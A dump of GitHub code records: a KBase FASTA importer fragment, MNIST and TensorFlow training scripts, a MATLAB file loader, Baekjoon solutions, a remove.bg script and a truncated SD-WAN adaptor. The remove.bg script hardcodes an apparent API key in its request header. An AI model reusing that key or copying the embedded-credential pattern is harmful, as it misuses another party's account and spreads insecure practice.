argument to unpack_files, not sure how much work that might be\n fs = [{'file_path': str(fp), 'unpack': 'uncompress'} for fp in in_files]\n unpacked_files = self._dfu.unpack_files(fs)\n return [Path(uf['file_path']) for uf in unpacked_files]\n\n def _stage_blobstore_inputs(self, inputs) -> List[Path]:\n blob_params = []\n for inp in inputs:\n blob_params.append({\n 'shock_id': inp[_NODE],\n 'file_path': str(self._create_temp_dir()),\n 'unpack': 'uncompress' # Will throw an error for archives\n })\n dfu_res = self._dfu.shock_to_file_mass(blob_params)\n return [Path(dr['file_path']) for dr in dfu_res]\n\n def _create_temp_dir(self):\n tmpdir = self._scratch / (\"import_fasta_\" + str(self._uuid_gen()))\n os.makedirs(tmpdir, exist_ok=True)\n return tmpdir\n\n def _set_up_single_params(self, params):\n inputs = dict(params)\n ws_id = self._get_int(inputs.pop(_WSID, None), _WSID)\n ws_name = inputs.pop('workspace_name', None)\n if (bool(ws_id) == bool(ws_name)): # xnor\n raise ValueError(f\"Exactly one of a {_WSID} or a workspace_name must be provided\")\n if not ws_id:\n print(f\"Translating workspace name {ws_name} to a workspace ID. Prefer submitting \"\n + \"a workspace ID over a mutable workspace name that may cause race conditions\")\n ws_id = self._dfu.ws_name_to_id(params['workspace_name'])\n\n if not inputs.get(_ASSEMBLY_NAME):\n raise ValueError(f\"Required parameter {_ASSEMBLY_NAME} was not defined\")\n\n # one and only one of either 'file' or 'shock_id' is required\n file_ = inputs.pop(_FILE, None)\n shock_id = inputs.pop('shock_id', None)\n if (bool(file_) == bool(shock_id)): # xnor\n raise ValueError(f\"Exactly one of {_FILE} or shock_id is required\")\n if file_:\n if not isinstance(file_, dict) or 'path' not in file_:\n raise ValueError('When specifying a FASTA file input, \"path\" field was '\n + f'not defined in \"{_FILE}\"')\n mass_params = {\n _WSID: ws_id,\n # Ideally set of minimum of 2 here, but left at 1 for backwards compatibility\n _MCL: self._get_int(inputs.pop(_MCL, None), f\"If provided, {_MCL}\"),\n _INPUTS: [inputs]\n }\n if file_:\n inputs[_FILE] = params[_FILE]['path']\n else:\n inputs[_NODE] = params['shock_id']\n return mass_params\n\n def _validate_mass_params(self, params):\n ws_id = self._get_int(params.get(_WSID), _WSID)\n if not ws_id:\n raise ValueError(f\"{_WSID} is required\")\n inputs = params.get(_INPUTS)\n if not inputs or type(inputs) != list:\n raise ValueError(f\"{_INPUTS} field is required and must be a non-empty list\")\n for i, inp in enumerate(inputs, start=1):\n if type(inp) != dict:\n raise ValueError(f\"Entry #{i} in {_INPUTS} field is not a mapping as required\")\n file_ = inputs[0].get(_FILE)\n if bool(file_) == bool(inputs[0].get(_NODE)): # xnor\n raise ValueError(f\"Entry #1 in {_INPUTS} field must have exactly one of \"\n + f\"{_FILE} or {_NODE} specified\")\n field = _FILE if file_ else _NODE\n for i, inp in enumerate(inputs, start=1):\n if not inp.get(field):\n raise ValueError(\n f\"Entry #{i} in {_INPUTS} must have a {field} field to match entry #1\")\n if not inp.get(_ASSEMBLY_NAME):\n raise ValueError(f\"Missing {_ASSEMBLY_NAME} field in {_INPUTS} entry #{i}\")\n self._get_int(params.get(_MCL), f\"If provided, {_MCL}\", minimum=2)\n\n def _get_int(self, putative_int, name, minimum=1):\n if putative_int is not None:\n if type(putative_int) != int:\n raise ValueError(f\"{name} must be an integer, got: {putative_int}\")\n if putative_int < minimum:\n raise ValueError(f\"{name} must be an integer >= {minimum}\")\n return putative_int\n","repo_name":"kbaseapps/AssemblyUtil","sub_path":"lib/AssemblyUtil/FastaToAssembly.py","file_name":"FastaToAssembly.py","file_ext":"py","file_size_in_byte":17197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4536169800","text":"'''\nThis file contains functionalities for training and loading the various models that were designed in this project.\nBased on the codebase at https://github.com/mike-fang/imprecise_optical_neural_network. The majority of the file is my own code.\n\n@version 3.8.2021\n'''\n\n\nimport numpy as np\nprint(1)\nimport torch as th\nprint(2)\nimport matplotlib.pylab as plt\nprint(3)\nfrom optical_nn import *\nprint(4)\nimport complex_torch_var as ct\nprint(5)\nfrom mnist import *\nprint(6)\nimport os\nprint(7)\nfrom time import time\nprint(8)\nfrom functools import partial\nprint(9)\nfrom glob import glob\nprint(10)\nfrom default_params import *\nprint(11)\nfrom torch.utils.tensorboard import SummaryWriter\n\nwriter = SummaryWriter('runs/QONN')\nprint(\"writer created\")\n\n\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\n\n# Good learning rates for different networks\nLR_FFT = 5e-2\nLR_GRID = 2.5e-4\nLR_COMPLEX = 5e-3\n\n'''\nTrain networks based on ComplexNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_complex(f=F_COMPLEX_TRAIN, n_h=[256, 256]):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 10\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = 1.0e-3\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_complex(hidden_units=n_h)\n print(net)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params, writer=writer)\n optim_params['lr'] /= 5\n\n train(net, **train_params, optim_params=optim_params, writer=writer, iteration = 1)\n acc = get_acc(net)\n\n print(f'Trained ComplexNet with accuracy {acc}.')\n writer.close()\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on a modified GridNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_cgrd(f=F_CGRD_TRAIN):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_GRID\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(unitary=CGRDUnitary)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained ComplexGridNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on GridNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_grid(f=F_GRID_TRAIN, n_h=[256, 256]):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_GRID\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(hidden_units=n_h)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained GridNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on FFTNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_fft(f=F_FFT_TRAIN, n_h=[256, 256]):\n \n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_FFT*3\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(FFTUnitary, hidden_units=n_h)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained FFTNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nConverts a ComplexNet into a GridNet.\n\nInputs:\n complex_net: the ComplexNet to convert\n f: location to save the GridNet\n rand_S: randomize GridNet structure\n'''\n'''\ndef convert_save_grid_net(complex_net=None, f=None, rand_S=True):\n if complex_net is None:\n complex_net = load_complex()\n\n if f is None:\n f = F_GRID_TRAIN if rand_S else F_GRID_ORD_TRAIN\n\n grid_net = complex_net.to_grid_net(rand_S=rand_S).to(DEVICE)\n acc = get_acc(grid_net)\n print(f'Converted to GridNet with accuracy {acc} with {\"shuffled\" if rand_S else \"ordered\"} singular values.')\n th.save(grid_net.state_dict(), f)\n print(f'Saved GridNet at {f}')\n'''\n\n'''\nTrain the ComplexNet in batches.\n\nInputs:\n n_train: Number of batches to train for\n dir: directory to save batches\n'''\ndef batch_train_complex(n_train, dir = DIR_COMPLEX_TRAIN):\n for _ in range(n_train):\n f = os.path.join(dir, f'{time():.0f}')\n train_complex(f=f)\n\n'''\nConvert a batch trained ComplexNet to a GridNet\n\nInputs:\n dir: directory of batches\n'''\n'''\ndef batch_convert(dir = DIR_COMPLEX_TRAIN):\n for f in glob(os.path.join(dir, '*')):\n net = load_complex(f)\n convert_save_grid_net(net, f=f+'_grid')\n'''\n\n'''\nLoad a ComplexNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_complex(f=F_COMPLEX_TRAIN):\n net = mnist_complex()\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'ComplexNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a GridNet from Directory and generate accuracy/confusion matrices.\n\nInputs:\n f: Directory of the model\n rand_S: whether or not to randomize GridNet states\n report_acc: whether or not to generate accuracy/confusion matrices\n\nOutputs:\n The loaded model\n'''\ndef load_grid(f=os.path.join(DIR_TRAINED_MODELS, 'grid_1_layer.pth'), rand_S=True, report_acc=True):\n if f is None:\n f = F_GRID_TRAIN if rand_S else F_GRID_ORD_TRAIN\n net = mnist_ONN()\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'GridNetOrdered loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a FFTNet from Directory.\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_fft(f=os.path.join(DIR_TRAINED_MODELS, 'fft_net.pth')):\n net = mnist_ONN(FFTUnitary)\n print(net)\n print(th.load(f, map_location=DEVICE))\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'FFTNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a CGRDNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_cgrd(f=F_CGRD_TRAIN):\n net = mnist_ONN(CGRDUnitary)\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'CGRDNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a Truncated GridNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_trunc_grid(f=os.path.join(DIR_TRAINED_MODELS, 'truncated_grid.pth')):\n net = mnist_grid_truncated()\n print(net)\n print(th.load(f, map_location=DEVICE))\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'Truncated GridNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\nif __name__ == '__main__':\n #train_complex()\n net = load_grid()\n \n for data, target in mnist_loader(train=False, batch_size=100, shuffle=False):\n continue\n data = data.view(-1, 28**2)\n data, target = data.to(DEVICE), target.to(DEVICE)\n print(th.max(net(data), dim=1))\n","repo_name":"rishab-partha/Quantum-Optical-ConvNet","sub_path":"train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":8614,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"72582360807","text":"import numpy as np\nimport tensorflow as tf\nimport scipy.io as scio\nimport h5py\nimport time\nimport os, os.path\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\n\n\n\n\n\nTRAIN_ROOT = '/media/coc/Dataset/train/'\nTEST_ROOT = '/media/coc/Dataset/test/'\nMATFILE = '/media/coc/Dataset/model-20180124.mat'\nPARTITIONS = 4\n\nBM_BINS = 257\nBM_SPREAD = 24\nHIDDEN_LAYER_WIDTH = 2048\n\nN_EPOCHS = 100\nBATCH_SIZE_INIT = 1000\nLEARN_RATE_INIT = 0.01\nDROPOUT_COEFF = 0.8\nL2_LOSS_COEFF = 0.00\nMOMENTUM_COEFF = 0.9\n\n\n\n\nTRAIN_PARTS = len([name for name in os.listdir(TRAIN_ROOT)])\nTEST_PARTS = len([name for name in os.listdir(TEST_ROOT)])\nprint(TRAIN_PARTS)\nprint(TEST_PARTS)\nrng = np.random.RandomState(842)\n\n\n\n\n\n##########################\n## GRAPH ##\n##########################\nclass Dense:\n\n def __init__(self, in_dim, out_dim, function=lambda x: x):\n self.W = tf.Variable(rng.uniform(low = -0.1, high = 0.1, size=(in_dim, out_dim)).astype('float32'), name='W')\n self.b = tf.Variable(np.zeros([out_dim]).astype('float32'))\n self.function = function\n self.params = [self.W, self.b]\n # self.ae = Autoencoder(in_dim, out_dim, self.W, self.function)\n\n def f_prop(self, x):\n u = tf.matmul(x, self.W) + self.b\n self.z = self.function(u)\n return self.z\n\n # def pretrain(self, x, noise):\n # cost, reconst_x = self.ae.reconst_error(x, noise)\n # return cost, reconst_x\n\n\n\ndef f_props(layers, x):\n for i, layer in enumerate(layers):\n x = layer.f_prop(x)\n if(i != len(layers)-1):\n x = tf.nn.dropout(x, keep_prob)\n return x\n\n\n\n\nlayers = [\n Dense(BM_BINS*BM_SPREAD, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, BM_BINS)\n]\n\nkeep_prob = tf.placeholder(tf.float32)\nx = tf.placeholder(tf.float32, [None, BM_BINS*BM_SPREAD])\nt = tf.placeholder(tf.float32, [None, BM_BINS])\ny = f_props(layers, x)\nlrate_p = tf.placeholder(tf.float32)\nmt_p = tf.placeholder(tf.float32)\n\n# cost = tf.reduce_mean(tf.reduce_sum((y - t)**2, 1))\ncost_op = (tf.reduce_mean(tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(labels=t, logits=y), 1)) + \n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[0].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[1].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[2].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[3].W)))\ntrain_op = tf.train.MomentumOptimizer(learning_rate=lrate_p, momentum=mt_p).minimize(cost_op)\n\n# saver = tf.train.Saver()\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n\n\n\n\n\n\n##########################\n## PROCESSING ##\n##########################\n\ndef load_dataset_to_mem(path, part_list):\n\n temp = scio.loadmat(path + 't_' + str(part_list[0]) + '.mat')\n spect = np.array(temp['spec'], dtype='float32')\n label = np.array(temp['bm'], dtype='float32')\n del temp\n\n for p_ in range(1, part_list.shape[0]):\n\n temp = scio.loadmat(path + 't_' + str(part_list[p_]) + '.mat')\n temp_spect = np.array(temp['spec'], dtype='float32')\n temp_label = np.array(temp['bm'], dtype='float32')\n \n spect = np.concatenate((spect,temp_spect))\n label = np.concatenate((label,temp_label))\n\n del temp_label\n del temp_spect\n del temp\n\n return spect, label\n\n\n\n\ndef evaluate_cost(spect, label):\n\n cost_value = sess.run(cost_op, feed_dict={x:spect, t:label, keep_prob:1.0})\n return cost_value\n\n\n\n\ndef training():\n\n evaluate_cost_opt = 1000000.0\n mt = MOMENTUM_COEFF\n lrate = LEARN_RATE_INIT\n lbs = BATCH_SIZE_INIT\n\n test_datapool, test_labelpool = load_dataset_to_mem(TEST_ROOT, shuffle(range(1,1+TEST_PARTS)))\n evaluate_cost_val = evaluate_cost(test_datapool, test_labelpool)\n print('[init]: validation cost: %.3f ' % (evaluate_cost_val))\n\n for epoch in range(N_EPOCHS):\n \n # exponential decay (simulated annealing) may converge to 'sharp' global minimum\n # which generalizes poorly. we use hybrid discrete noise scale falling here.\n if epoch >= 20:\n lbs = 2000\n if epoch >= 40:\n lbs = 4000\n if epoch >= 60:\n lbs = 8000\n if epoch >= 70:\n lrate = 0.001\n if epoch >= 80:\n lrate = 0.0001\n if epoch >= 90:\n lrate = 0.00001\n \n time_start = time.time()\n part_list = shuffle(range(1,1+TRAIN_PARTS))\n part_n = len(part_list)\n part_i = 0\n\n part_list_breakout = np.array_split(part_list, PARTITIONS)\n for part_ in part_list_breakout:\n \n train_data, train_label = load_dataset_to_mem(TRAIN_ROOT, part_)\n train_data, train_label = shuffle(train_data, train_label)\n n_batch = train_label.shape[0] // lbs\n\n for i in range(n_batch):\n start = i * lbs\n end = start + lbs\n sess.run(train_op, feed_dict={x:train_data[start:end], t:train_label[start:end], keep_prob:DROPOUT_COEFF, lrate_p:lrate, mt_p:mt})\n\n del train_label\n del train_data \n part_i += 1\n print('...%d/%d'%(part_i,part_n))\n\n evaluate_cost_val = evaluate_cost(test_datapool, test_labelpool)\n time_end = time.time()\n print('[epoch %i] validation cost = %.3f ' % (epoch + 1, evaluate_cost_val))\n print('[epoch %i] time = %.3f (sec)' % (epoch + 1, time_end - time_start))\n\n if (evaluate_cost_val < evaluate_cost_opt):\n save_dict = {}\n save_dict['W1'] = sess.run(layers[0].W)\n save_dict['b1'] = sess.run(layers[0].b)\n save_dict['W2'] = sess.run(layers[1].W)\n save_dict['b2'] = sess.run(layers[1].b)\n save_dict['W3'] = sess.run(layers[2].W)\n save_dict['b3'] = sess.run(layers[2].b)\n save_dict['W4'] = sess.run(layers[3].W)\n save_dict['b4'] = sess.run(layers[3].b)\n\n scio.savemat(MATFILE, save_dict)\n evaluate_cost_opt = evaluate_cost_val\n print('[epoch %d] model saved' % (epoch + 1))\n\n del test_labelpool\n del test_datapool\n\n\n\n\ntraining()\nsess.close()\n\n\n\n\n\n\n\n\n##########################\n## NOT IN USE ##\n##########################\ndef make_window_buffer(x, neighbor=3):\n m, n = x.shape\n tmp = np.zeros(m * n * (neighbor * 2 + 1), dtype='float32').reshape(m, -1)\n for i in range(2 * neighbor + 1):\n if (i <= neighbor):\n shift = neighbor - i\n tmp[shift:m, i * n: (i + 1) * n] = x[:m - shift]\n for j in range(shift):\n tmp[j, i * n: (i + 1) * n] = x[0, :]\n else:\n shift = i - neighbor\n tmp[:m-shift, i * n: (i+1) * n] = x[shift:m]\n for j in range(shift):\n tmp[m-(j + 1), i * n: (i + 1) * n] = x[m-1, :]\n return tmp\n\ndef Normalize_data(x, mu, std):\n mean_noisy_10 = np.tile(mu, [8])\n std_noisy_10 = np.tile(std, [8])\n tmp = (x-mean_noisy_10)/std_noisy_10\n return np.array(tmp, dtype='float32')\n\ndef Normalize_label(x, mu, std):\n tmp = (x-mu)/std\n return np.array(tmp, dtype='float32')\n\ndef gen_context(x, neighbor, gmu, gstd):\n m = x.shape[0]\n u = make_window_buffer(x, neighbor)\n\n nat = np.zeros([m, 257])\n for k in range(0,7):\n nat += u[:, k*257:(k+1)*257]\n u = np.c_[u, nat/7]\n u = Normalize_data(u, gmu, gstd)\n return u\n# u: np.zeros([m, 257*8])\n\nclass Autoencoder:\n\n def __init__(self, vis_dim, hid_dim, W, function=lambda x: x):\n self.W = W\n self.a = tf.Variable(np.zeros(vis_dim).astype('float32'), name='a')\n self.b = tf.Variable(np.zeros(hid_dim).astype('float32'), name='b')\n self.function = function\n self.params = [self.W, self.a, self.b]\n\n def encode(self, x):\n u = tf.matmul(x, self.W) + self.b\n return self.function(u)\n\n def decode(self, x):\n u = tf.matmul(x, tf.transpose(self.W)) + self.a\n return self.function(u)\n\n def f_prop(self, x):\n y = self.encode(x)\n return self.decode(y)\n\n def reconst_error(self, x, noise):\n tilde_x = x * noise\n reconst_x = self.f_prop(tilde_x)\n error = tf.reduce_mean(tf.reduce_sum((x - reconst_x)**2, 1))\n return error, reconst_x\n\n\n\n\n","repo_name":"xia-lixun/dnn","sub_path":"src/python/train-crossentropy-matlab.py","file_name":"train-crossentropy-matlab.py","file_ext":"py","file_size_in_byte":8468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35225274312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: pho\n\"\"\"\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import kde\nimport h5py\nimport hdf5storage # conda install hdf5storage\nfrom pathlib import Path\n\n# Include using: from Pho_Import_Matlab_Data import import_mat_file, load_mat_file, print_variables\n\nfrom Pho_Import_Matlab_Data.plot_matlab_fig_file import plot_matlab_fig_file\n\n# See https://docs.h5py.org/en/stable/quick.html#quick for more info\n## In short, An HDF5 file is a container for two kinds of objects: datasets, which are array-like collections of data, and groups, which are folder-like containers that hold datasets and other groups. The most fundamental thing to remember when using h5py is:\n#### Groups work like dictionaries, and datasets work like NumPy arrays\n\nenable_print_type_values = True\n\ndef printname(name):\n print(name)\n\ndef print_attrs(name, obj):\n # Create indent\n shift = name.count('/') * ' '\n item_name = name.split(\"/\")[-1] # Get only the last suffix of the path (the variable name)\n if name.startswith(\"#refs#\"):\n # Exclude top level '#refs#' Group\n # print('Skipping #refs# group and its children...')\n # return -1 # Apparently returning a non-None value stops enumeration\n pass\n else:\n if isinstance(obj, h5py.Dataset):\n # obj node is a dataset\n print(': ' + shift + item_name)\n else:\n # obj node is a group\n print(': ' + shift + item_name)\n if enable_print_type_values:\n try:\n for key, val in obj.attrs.items():\n print(shift + ' ' + f\"{key}: {val}\")\n except:\n pass\n\n\n## Import Function Definitions:\n\ndef import_mat_file(mat_file_path):\n print('opening .mat file at {}'.format(mat_file_path))\n f = h5py.File(mat_file_path,'r')\n return f\n # print(f.keys())\n # data_position = f.get(active_variables)\n\n \ndef build_tree_entries(mat_file):\n data = [\n {'level': 0, 'dbID': 77, 'parent_ID': 6, 'short_name': '{}'.format(mat_file), 'long_name': '', 'order': 1, 'pos': 0} ,\n ]\n # f.keys()\n return data\n\n\ndef print_variables(h5pyFile, recurrsively=False):\n # Get the list of keys for the file\n # h5pyFile.keys()\n # h5pyFile.visit(printname)\n h5pyFile.visititems(print_attrs)\n\ndef load_mat_file(mat_file_path):\n out = hdf5storage.loadmat(mat_file_path) # Load all variables by default\n return out\n\n#end\n","repo_name":"CommanderPho/PhoPyMatlabConverter","sub_path":"Pho_Import_Matlab_Data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27967151286","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n#https://www.acmicpc.net/problem/21735\n# l,k = wow()\n# n_list = [1]+list(wow())\n# cnt = 0\n# visited = [False]*(l+1)\n# def go(index,count,total,visited,record):\n# global k\n# global cnt\n# global l\n# # print(\"start!!\",index)\n# # print(\"record\",record,count)\n# # print(\"start\",index,count,total)\n# if count == k+1:\n# # print(\"wow!!\",index,total,count)\n# # print(visited)\n# if cnt < total:\n# cnt = total\n# return\n# if index <=l:\n# if visited[index] == False:\n# visited[index]=True\n# total+=n_list[index]\n# record.append(total)\n# count+=1\n# go(index+1,count,total,visited,record)\n# go(index+2,count,total//2,visited,record)\n# record.pop()\n# count-=1\n# total-=n_list[index]\n# visited[index]=False\n# else:\n# if cnt < total:\n# cnt = total\n# return\n# go(0,0,0,visited,[])\n# print(cnt)\n\n#https://www.acmicpc.net/problem/26169\n# n_list = [list(wow()) for _ in range(5)]\n# r,l = wow()\n# visited = [[False]*5 for _ in range(5)]\n# for y in range(5):\n# for x in range(5):\n# if n_list[y][x]==-1:\n# visited[y][x]=True\n# check = \"no\"\n# def go(y,x,count,total,visited):\n# global check\n# # print(\"Start\",y,x,count,total)\n# if count == 4:\n# if total >= 2:\n# check = \"yes\"\n# return\n# if total >=2:\n# check = \"yes\"\n# return\n# if 0<=y<=4 and 0<=x<=4:\n# if visited[y][x] == False:\n# visited[y][x]=True\n# if n_list[y][x] == 1:\n# total+=1\n# count+=1\n# go(y+1,x,count,total,visited) \n# go(y-1,x,count,total,visited) \n# go(y,x+1,count,total,visited) \n# go(y,x-1,count,total,visited) \n# count-=1\n# visited[y][x]=False\n# if n_list[y][x]==1:\n# total-=1\n# go(r,l,0,0,visited)\n# print(0 if check==\"no\" else 1)\n\n#https://www.acmicpc.net/problem/25328\nfrom itertools import permutations\na = list(inputing())\nb = list(inputing())\nc = list(inputing())\nk = one()\na = set(permutations(a,r=k))\nb = set(permutations(b,r=k))\nc = set(permutations(c,r=k))\nx,y,z = set(a&b),set(b&c),set(a&c)\nr = set(list(map(\"\".join,(map(sorted,list(x | y|z))))))\nif r:\n r = sorted(list(r))\n print(*r,sep=\"\\n\")\nelse:\n print(-1)\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2023/2월/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33941340008","text":"# Requires \"requests\" to be installed (see python-requests.org)\nimport requests\npath = input(\"Enter file path\")\nresponse = requests.post(\n 'https://api.remove.bg/v1.0/removebg',\n files={'image_file': open(path, 'rb')},\n data={'size': 'auto'},\n headers={'X-Api-Key': 'BeoTpZimF517Xc2vFsAN1HLY'},\n)\nif response.status_code == requests.codes.ok:\n with open('no-bg.png', 'wb') as out:\n out.write(response.content)\nelse:\n print(\"Error:\", response.status_code, response.text)\n","repo_name":"abhinavsatheesh/Programming","sub_path":"Python/PythonPrograms/RemoveImageBg.py","file_name":"RemoveImageBg.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21076248226","text":"import os\nimport logging\nimport pprint\nlogging.basicConfig(filename='adaptor.log', level=logging.DEBUG, \\\n datefmt='%a, %d %b %Y %H:%M:%S')\nlogger = logging.getLogger(__name__)\n \n\n\nimport metadata_adaptor.server_errors as err\nimport metadata_adaptor.template_generator as templates\nimport metadata_adaptor.vmanage_functions as vmg\n\nclass api_endpoint:\n\n def __init__(self):\n\n \n #Load config via env vars\n SDWAN_IP = os.environ.get(\"SDWAN_IP\")\n SDWAN_USERNAME = os.environ.get(\"SDWAN_USERNAME\")\n SDWAN_PASSWORD = os.environ.get(\"SDWAN_PASSWORD\")\n MERGE_POLICY = os.environ.get(\"MERGE_POLICY\")\n\n # SDWAN Controller endpoint\n self.api_endpoint = None\n\n # Internal vars \n self.srv_endpoints = {}\n self.app_route_traffic_profiles = {}\n self.data_traffic_profiles = {}\n self.metadata_keys = []\n\n # SDWAN Controller credentials\n self.credentials = {}\n self.credentials['sdwanControllerIpAddress'] = None\n self.credentials['user'] = None\n self.credentials['password'] = None\n self.credentials['sdwanMergedPolicyName'] = None\n\n\n\n # SDWAN controller login if env vars \n if (SDWAN_IP is not None) and (SDWAN_USERNAME is not None) \\\n and (SDWAN_PASSWORD is not None) and (MERGE_POLICY is not None):\n self.credentials['sdwanControllerIpAddress'] = SDWAN_IP\n self.credentials['user'] = SDWAN_USERNAME\n self.credentials['password'] = SDWAN_PASSWORD\n self.credentials['sdwanMergedPolicyName'] = MERGE_POLICY\n self.post_credentials(self.credentials)\n \n logger.info('Connecting to server %s', SDWAN_IP)\n \n\n def check_config(self):\n\n if self.credentials['sdwanControllerIpAddress'] is None or \\\n self.credentials['user'] is None or \\\n self.credentials['password'] is None:\n logger.error(\"Credentials of SDWAN controller are not defined.\")\n raise err.NoConfigData('Controller credentials user/password or IP')\n \n def test_connection(self):\n if self.api_endpoint.test_disconnect():\n logger.info(\"Connection lost to the SDWAN controller, re-authenticating.\")\n self.post_credentials(self.credentials)\n \n\n \n\n### SDWAN CONTROLLER CREDENTIALS\n\n def get_credentials(self):\n return self.credentials\n\n def post_credentials(self, cred):\n try:\n self.api_endpoint = vmg.rest_api_lib(cred['sdwanControllerIpAddress'], \\\n cred['user'], cred['password'])\n except Exception as e:\n raise e\n self.credentials = cred\n \n\n def delete_credentials(self):\n self.credentials['sdwanControllerIpAddress'] = None\n self.credentials['user'] = None\n self.credentials['password'] = None\n self.credentials['sdwanMergedPolicyName'] = None\n\n\n### SERVICE ENDPOINTS MANAGEMENT\n \n def get_service_endpoints_by_profile(self, profile):\n \n endpoints =[]\n \n for key, data in self.srv_endpoints.items():\n if data['trafficProfileName'] == profile:\n endpoints.append(key)\n \n return endpoints\n \n def delete_service_endpoint_by_profile(self, profile):\n \n to_delete = []\n \n for key, data in self.srv_endpoints.items():\n if data['trafficProfileName'] == profile:\n to_delete.append(key)\n \n for key in to_delete:\n del self.srv_endpoints[key] \n \n\n def get_service_endpoints(self):\n\n temp = []\n for key, profile in self.srv_endpoints.items():\n temp_key = key.split('_')\n temp.append({\n \"ipAddress\": temp_key[0],\n \"portNumber\": temp_key[1],\n \"trafficProfileName\": profile\n })\n 